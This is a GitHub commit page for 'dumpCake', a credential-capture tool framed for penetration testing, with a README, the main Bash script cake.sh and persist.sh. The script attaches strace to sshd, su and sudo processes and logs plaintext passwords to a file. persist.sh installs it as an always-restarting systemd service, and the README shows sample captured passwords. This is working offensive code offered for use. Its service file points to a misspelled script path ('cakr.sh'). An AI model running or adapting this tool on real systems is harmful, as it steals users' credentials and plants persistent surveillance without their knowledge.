-
Notifications
You must be signed in to change notification settings - Fork 6
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit aefa5b5
Showing
3 changed files
with
327 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,107 @@ | ||
| # dumpCake | ||
|
|
||
| This tool captures and logs passwords used during authentication attempts for su/sudo and SSH sessions. It works by attaching to each SSHD, Sudo, and Su process and recording the attempted passwords and related details. | ||
|
|
||
| It can be particularly useful during a penetration test when scanning computers on a network and attempting to authenticate with Domain Admin credentials. It can also be employed on a jumphost to capture plaintext credentials when users elevate their privileges. | ||
|
|
||
| # Prerequisites | ||
| sudo apt install strace | ||
|
|
||
| # Usage | ||
|
|
||
| ``` | ||
| ┌──(root㉿kali)-[~/dumpCake] | ||
| └─# ./cake.sh | ||
| Writing to /root/pass.log | ||
| Found SSHD Pid: 3011949. Attaching... | ||
| Method: sshd | ||
| May 23 17:16:03 kali sshd[3011949]: Invalid user frank from 172.25.25.132 port 50962 | ||
| May 23 17:16:06 kali sshd[3011949]: Failed password for invalid user frank from 172.25.25.132 port 50962 ssh2 | ||
| May 23 17:16:20 kali sshd[3011949]: Failed password for invalid user frank from 172.25.25.132 port 50962 ssh2 | ||
| May 23 17:16:21 kali sshd[3011949]: Failed password for invalid user frank from 172.25.25.132 port 50962 ssh2 | ||
| May 23 17:16:21 kali sshd[3011949]: Connection reset by invalid user frank 172.25.25.132 port 50962 [preauth] | ||
| Password Attempt 1: "1234" | ||
| Password Attempt 2: "Spring2022!" | ||
| Password Attempt 3: "" | ||
| ---------------------------------------------------- | ||
| Found SSHD Pid: 3022996. Attaching... | ||
| Method: sshd | ||
| May 23 17:16:32 kali sshd[3022996]: Accepted password for spicy from 172.25.25.132 port 50964 ssh2 | ||
| Password Attempt 1: "Password1!" | ||
| ---------------------------------------------------- | ||
| Found Su Pid: 3028865. Attaching... | ||
| Process : su spicy | ||
| User: spicy | ||
| Password Attempt: "Password1!" | ||
| Successfully Elevated | ||
| ---------------------------------------------------- | ||
| Found Sudo Pid: 3037832. Attaching... | ||
| Process : sudo id | ||
| User: root | ||
| Elevation Failed | ||
| ---------------------------------------------------- | ||
| Found Sudo Pid: 3040090. Attaching... | ||
| Process : sudo id | ||
| User: spicy | ||
| Password Attempt 1: "Password1!" | ||
| Successfully Elevated | ||
| ---------------------------------------------------- | ||
| ``` | ||
|
|
||
| #To install as a service | ||
| ``` | ||
| ┌──(root㉿kali)-[~/dumpCake] | ||
| └─# ./persist.sh | ||
| Created symlink /etc/systemd/system/multi-user.target.wants/password-logging.service → /etc/systemd/system/password-logging.service. | ||
| ``` | ||
|
|
||
| #Log output | ||
| ``` | ||
| ┌──(root㉿kali)-[~] | ||
| └─# tail -f pass.log | ||
| Method: sshd | ||
| May 23 17:12:52 kali sshd[2937189]: Invalid user frank from 172.25.25.132 port 50928 | ||
| May 23 17:12:56 kali sshd[2937189]: Failed password for invalid user frank from 172.25.25.132 port 50928 ssh2 | ||
| May 23 17:13:00 kali sshd[2937189]: Connection reset by invalid user frank 172.25.25.132 port 50928 [preauth] | ||
| Password Attempt 1: "1234" | ||
| ---------------------------------------------------- | ||
| Method: sshd | ||
| May 23 17:13:08 kali sshd[2942270]: Accepted password for spicy from 172.25.25.132 port 50929 ssh2 | ||
| Password Attempt 1: "Password1!" | ||
| ---------------------------------------------------- | ||
| Method: sshd | ||
| May 23 17:16:03 kali sshd[3011949]: Invalid user frank from 172.25.25.132 port 50962 | ||
| May 23 17:16:06 kali sshd[3011949]: Failed password for invalid user frank from 172.25.25.132 port 50962 ssh2 | ||
| May 23 17:16:20 kali sshd[3011949]: Failed password for invalid user frank from 172.25.25.132 port 50962 ssh2 | ||
| May 23 17:16:21 kali sshd[3011949]: Failed password for invalid user frank from 172.25.25.132 port 50962 ssh2 | ||
| May 23 17:16:21 kali sshd[3011949]: Connection reset by invalid user frank 172.25.25.132 port 50962 [preauth] | ||
| Password Attempt 1: "1234" | ||
| Password Attempt 2: "Spring2022!" | ||
| Password Attempt 3: "" | ||
| ---------------------------------------------------- | ||
| Method: sshd | ||
| May 23 17:16:32 kali sshd[3022996]: Accepted password for spicy from 172.25.25.132 port 50964 ssh2 | ||
| Password Attempt 1: "Password1!" | ||
| ---------------------------------------------------- | ||
| Process : su spicy | ||
| User: spicy | ||
| Password Attempt: "Password1!" | ||
| Successfully Elevated | ||
| ---------------------------------------------------- | ||
| Process : sudo id | ||
| User: root | ||
| Elevation Failed | ||
| ---------------------------------------------------- | ||
| Process : sudo id | ||
| User: spicy | ||
| Password Attempt 1: "Password1!" | ||
| Successfully Elevated | ||
| ---------------------------------------------------- | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,183 @@ | ||
| #!/bin/bash | ||
|
|
||
| # Function to attach to SSH process and extract password attempts | ||
| attach_ssh () { | ||
| # Capture the lines containing password attempts by tracing the process | ||
| PASSWORD_LINES=$(strace -p $1 2>&1 | grep 'read(6, \"\\f') | ||
|
|
||
| # Extract lines containing the SSH username and port information from the auth.log file | ||
| USERNAME_LINES=$(journalctl -u ssh.service | grep ssh[d].$pid.*port) | ||
|
|
||
| if [[ -z "$USERNAME_LINES" ]]; then | ||
| USERNAME_LINES=$(grep "ssh[d].$pid.*port" /var/log/auth.log) | ||
| fi | ||
|
|
||
| # Initialize a counter for password attempts | ||
| COUNT=1 | ||
|
|
||
| echo "Method: sshd" | tee -a $LOG_FILE | ||
|
|
||
| # Print and log the username lines containing the user or IP information | ||
| echo "$USERNAME_LINES" | egrep --color "(user|for).(\w)*" |tee -a $LOG_FILE | ||
|
|
||
| if [[ -z $sshloginpids ]]; then | ||
| echo "No Password Attempt Found" |tee -a $LOG_FILE | ||
| else | ||
| # Loop through each line containing a password attempt | ||
| while IFS= read -r PLINE; do | ||
|
|
||
| # Extract the password from the line and remove non-printable characters | ||
| PASSWORD=$(printf "$PLINE" | tr -cd '[:print:]' | cut -f 2 -d \") | ||
|
|
||
| # Print and log the password attempt with the corresponding count | ||
| echo "Password Attempt $COUNT: \"$PASSWORD\"" | tee -a $LOG_FILE | ||
|
|
||
| # Increment the counter | ||
| COUNT=$((COUNT+1)) | ||
| done <<< "$PASSWORD_LINES" | ||
| fi | ||
|
|
||
| # Print a separator line for better readability in the log file | ||
| echo "----------------------------------------------------" |tee -a $LOG_FILE | ||
| } | ||
|
|
||
| parse_su () { | ||
| PS_COMM=$( ps -p $1 -o command --no-header ) | ||
|
|
||
| # Capture the lines containing password attempts by tracing the process | ||
| OUTPUT_LINES=$(strace -p $1 2>&1 ) | ||
| USER_UID=$(echo "$OUTPUT_LINES" | grep -i getuid | awk '{print $3}' | sort -u) | ||
| USER_NAME=$(id -nu $USER_UID ) | ||
| PASSWORD=$(echo "$OUTPUT_LINES" | grep read\(0 | sed s#\\\\n##g | cut -f 2 -d \") | ||
| FAILED_ELEVATION=$( echo "$OUTPUT_LINES" | grep "Authentication failure" | wc -l ) | ||
| echo | ||
| echo Process : "$PS_COMM" | tee -a $LOG_FILE | ||
| echo "User: $USER_NAME" | tee -a $LOG_FILE | ||
| # Print and log the password attempt | ||
| echo "Password Attempt: \"$PASSWORD\"" | tee -a $LOG_FILE | ||
| if [[ "$FAILED_ELEVATION" -gt 0 ]]; then | ||
| echo Elevation Failed | tee -a $LOG_FILE | ||
| else | ||
| echo Successfully Elevated | tee -a $LOG_FILE | ||
| fi | ||
| # Print a separator line for better readability in the log file | ||
| echo "----------------------------------------------------" |tee -a $LOG_FILE | ||
| } | ||
| parse_sudo () { | ||
| PS_COMM=$( ps -p $1 -o command --no-header ) | ||
| OUTPUT_LINES=$(strace -p $1 2>&1 ) | ||
| USER_UID=$(echo "$OUTPUT_LINES" | grep -i getuid | awk '{print $3}' | sort -u) | ||
| USER_NAME=$(id -nu $USER_UID ) | ||
| PASSWORD_LINES=$(echo "$OUTPUT_LINES" | grep ^read | grep "\ 1$" | cut -f 2 -d \" | tr -d '\n') | ||
| SUCCESSFUL_ELEVATION=$( echo "$OUTPUT_LINES" | grep "setresuid.*\ 0\," | wc -l ) | ||
| # Initialize a counter for password attempts | ||
| COUNT=1 | ||
| echo | ||
| echo Process : $PS_COMM | tee -a $LOG_FILE | ||
| echo "User: $USER_NAME" | tee -a $LOG_FILE | ||
| while IFS= read -r PASSWORD; do | ||
| # Print and log the password attempt with the corresponding count | ||
| echo "Password Attempt $COUNT: \"$PASSWORD\"" | tee -a $LOG_FILE | ||
| # Increment the counter | ||
| COUNT=$((COUNT+1)) | ||
| done < <( printf "$PASSWORD_LINES" ) | ||
| if [[ "$SUCCESSFUL_ELEVATION" -gt 0 ]]; then | ||
| echo Successfully Elevated | tee -a $LOG_FILE | ||
| else | ||
| echo Elevation Failed | tee -a $LOG_FILE | ||
| fi | ||
| # Print a separator line for better readability in the log file | ||
| echo "----------------------------------------------------" |tee -a $LOG_FILE | ||
| } | ||
| # Check if strace is installed | ||
| if ! command -v strace >/dev/null 2>&1; then | ||
| echo "strace is not installed. Please install it before running this script." | ||
| exit 1 | ||
| fi | ||
| # Check if running in an elevated context | ||
| if [[ $EUID -ne 0 ]]; then | ||
| echo "This script requires elevated privileges. Please run it as root or using sudo." | ||
| exit 1 | ||
| fi | ||
| processed_pids=() # Array to track processed PIDs | ||
| LOG_FILE="/root/pass.log" | ||
| printf "Writing to $LOG_FILE\n\n" | ||
| while true; do | ||
| unset sshloginpids | ||
| unset supids | ||
| unset sudopids | ||
| recent_process_list=$(ps -eo pid,etimes,comm,command | awk '{if ($2 < 60) { print $0}}') | ||
| sshloginpids=$(echo "$recent_process_list" | grep ss[h]d.*priv | awk '{print $1}') | ||
| supids=$(echo "$recent_process_list" | awk '{if ($3 == "su") { print $1}}') | ||
| sudopids=$(echo "$recent_process_list" | awk '{if ($3 == "sudo") { print $1}}') | ||
| if [[ ! -z $sshloginpids ]]; then | ||
| for pid in $sshloginpids; do | ||
| # Check if PID has been processed before | ||
| if [[ " ${processed_pids[*]} " != *" $pid "* ]]; then | ||
| echo "Found SSHD Pid: $pid. Attaching..." | ||
| processed_pids+=("$pid") # Add PID to processed_pids array | ||
| attach_ssh $pid & | ||
| fi | ||
| done | ||
| fi | ||
| if [[ ! -z $supids ]]; then | ||
| for pid in $supids; do | ||
| # Check if PID has been processed before | ||
| if [[ " ${processed_pids[*]} " != *" $pid "* ]]; then | ||
| echo "Found Su Pid: $pid. Attaching..." | ||
| processed_pids+=("$pid") # Add PID to processed_pids array | ||
| parse_su $pid & | ||
| fi | ||
| done | ||
| fi | ||
| if [[ ! -z $sudopids ]]; then | ||
| for pid in $sudopids; do | ||
| # Check if PID has been processed before | ||
| if [[ " ${processed_pids[*]} " != *" $pid "* ]]; then | ||
| echo "Found Sudo Pid: $pid. Attaching..." | ||
| processed_pids+=("$pid") # Add PID to processed_pids array | ||
| parse_sudo $pid & | ||
| fi | ||
| done | ||
| fi | ||
| done | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| #!/bin/bash | ||
|
|
||
|
|
||
| # Check if running in an elevated context | ||
| if [[ $EUID -ne 0 ]]; then | ||
| echo "This script requires elevated privileges. Please run it as root or using sudo." | ||
| exit 1 | ||
| fi | ||
|
|
||
|
|
||
| # Copy the script to /root directory after making executable | ||
| chmod +x cake.sh | ||
| cp cake.sh /root | ||
|
|
||
|
|
||
| # Create a systemd service file | ||
| SERVICE_FILE="/etc/systemd/system/password-logging.service" | ||
| cat << EOF > $SERVICE_FILE | ||
| [Unit] | ||
| Description=Password Logging Service | ||
| After=network.target | ||
| [Service] | ||
| ExecStart=/root/cakr.sh | ||
| Restart=always | ||
| RestartSec=10 | ||
| [Install] | ||
| WantedBy=multi-user.target | ||
| EOF | ||
|
|
||
| # Reload systemd daemon and start the service | ||
| systemctl daemon-reload | ||
| systemctl start password-logging.service | ||
|
|
||
| # Enable the service to start on boot | ||
| systemctl enable password-logging.service |